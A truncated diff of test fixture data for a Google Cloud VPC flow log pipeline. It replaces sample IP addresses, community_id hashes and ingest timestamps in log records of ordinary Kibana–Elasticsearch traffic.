"{\"insertId\":\"bnj3cofh3cdkk\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":52454},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391462100Z", + "original": "{\"insertId\":\"bnj3cofh3cdkk\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":52454},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:42:40.779893091Z", "end": "2019-06-14T03:42:40.888804332Z", @@ -5724,18 +5724,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 259510, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 251 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:kmlKCdqw/+vcFaSeBx9hVkJjnAE=", + "community_id": "1:C7B7lD6dSCm1Xnh0Cv/Rl2jt7CY=", "bytes": 259510, "name": "default", "transport": "tcp", @@ -5757,7 +5757,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -5794,8 +5794,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868626100Z", - "original": "{\"insertId\":\"bnj3cofh3cdk0\",\"jsonPayload\":{\"bytes_sent\":\"259510\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33534,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597279654Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075756033Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391465500Z", + "original": "{\"insertId\":\"bnj3cofh3cdk0\",\"jsonPayload\":{\"bytes_sent\":\"259510\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33534,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597279654Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075756033Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075756033Z", "end": "2019-06-14T03:49:59.597279654Z", @@ -5816,9 +5816,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 52260, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -5832,7 +5832,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MlFaFjbkXS6KKyiSbXcNDQJbn8U=", + "community_id": "1:jQQ6l4o1MZQiUFoVCT++dIYahM8=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -5847,7 +5847,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { @@ -5871,8 +5871,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868629300Z", - "original": "{\"insertId\":\"bnj3cofh3cdk8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":52260,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391469700Z", + "original": "{\"insertId\":\"bnj3cofh3cdk8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":52260,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:42:11.063146265Z", "end": "2019-06-14T03:42:11.183868408Z", @@ -5893,10 +5893,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -5910,7 +5910,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ZvwQ2j/3ZuFaLSX6WH5V4iy9utU=", + "community_id": "1:IEnrf1LJAN4LjLMkDE8yTRHo3KA=", "bytes": 65069, "name": "default", "transport": "tcp", @@ -5933,7 +5933,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -5969,8 +5969,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868632200Z", - "original": "{\"insertId\":\"bnj3cofh3cdkp\",\"jsonPayload\":{\"bytes_sent\":\"65069\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33530},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565300944Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140119099Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391475200Z", + "original": "{\"insertId\":\"bnj3cofh3cdkp\",\"jsonPayload\":{\"bytes_sent\":\"65069\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33530},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565300944Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140119099Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140119099Z", "end": "2019-06-14T03:49:59.565300944Z", @@ -5991,10 +5991,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -6008,7 +6008,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:88xKud9UZj+uL0CBL+jvBleTFIk=", + "community_id": "1:xlc9p+qqPBlTtvXaxYaz5GAWNls=", "bytes": 60530, "name": "default", "transport": "tcp", @@ -6031,7 +6031,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -6067,8 +6067,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868635600Z", - "original": "{\"insertId\":\"bnj3cofh3cdkc\",\"jsonPayload\":{\"bytes_sent\":\"60530\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33556},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"366\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391480800Z", + "original": "{\"insertId\":\"bnj3cofh3cdkc\",\"jsonPayload\":{\"bytes_sent\":\"60530\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33556},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"366\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:59.565335113Z", @@ -6095,18 +6095,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33570, "bytes": 11384, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 86 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:W60ErjE9kT0Dm5xlbB8kttSgelA=", + "community_id": "1:F7T6LmH5wVzEgGnm1LS0ir3ltmg=", "bytes": 11384, "name": "default", "transport": "tcp", @@ -6128,7 +6128,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -6165,8 +6165,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868639200Z", - "original": "{\"insertId\":\"bnj3cofh3cdkm\",\"jsonPayload\":{\"bytes_sent\":\"11384\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33570},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821047175Z\",\"packets_sent\":\"86\",\"reporter\":\"DEST\",\"rtt_msec\":\"230\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469473010Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391486700Z", + "original": "{\"insertId\":\"bnj3cofh3cdkm\",\"jsonPayload\":{\"bytes_sent\":\"11384\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33570},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821047175Z\",\"packets_sent\":\"86\",\"reporter\":\"DEST\",\"rtt_msec\":\"230\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469473010Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469473010Z", "end": "2019-06-14T03:49:51.821047175Z", @@ -6187,10 +6187,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33554, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -6204,7 +6204,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BbRNTmVcGaqf/baRzluKDpJAprQ=", + "community_id": "1:8vM4z84sXvUT94gexJfa2ZSNZ/c=", "bytes": 272063, "name": "default", "transport": "tcp", @@ -6227,7 +6227,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -6263,8 +6263,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868642300Z", - "original": "{\"insertId\":\"bnj3cofh3cdjy\",\"jsonPayload\":{\"bytes_sent\":\"272063\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33554,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565131125Z\",\"packets_sent\":\"247\",\"reporter\":\"SRC\",\"rtt_msec\":\"224\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143837873Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391492100Z", + "original": "{\"insertId\":\"bnj3cofh3cdjy\",\"jsonPayload\":{\"bytes_sent\":\"272063\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33554,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565131125Z\",\"packets_sent\":\"247\",\"reporter\":\"SRC\",\"rtt_msec\":\"224\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143837873Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.143837873Z", "end": "2019-06-14T03:49:59.565131125Z", @@ -6285,9 +6285,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 53706, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -6301,7 +6301,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:0BGh5oABRy6JrttDfTSBw1iBDW4=", + "community_id": "1:FnUL58e/2lopFxzyH6NB4ZfRZYg=", "bytes": 1791, "transport": "tcp", "type": "ipv4", @@ -6316,7 +6316,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { @@ -6340,8 +6340,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868645300Z", - "original": "{\"insertId\":\"bnj3cofh3cdjv\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":53706,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"43\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391497500Z", + "original": "{\"insertId\":\"bnj3cofh3cdjv\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53706,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"43\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:43:50.703302550Z", "end": "2019-06-14T03:43:50.822333871Z", @@ -6368,18 +6368,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33858, "bytes": 18295, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 118 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:DXSnxcLrDyftjOc5jFhwTKkshsM=", + "community_id": "1:FZaxwdeLVaVT2X3mtyj9cQcUk8w=", "bytes": 18295, "name": "default", "transport": "tcp", @@ -6401,7 +6401,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -6438,8 +6438,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868648500Z", - "original": 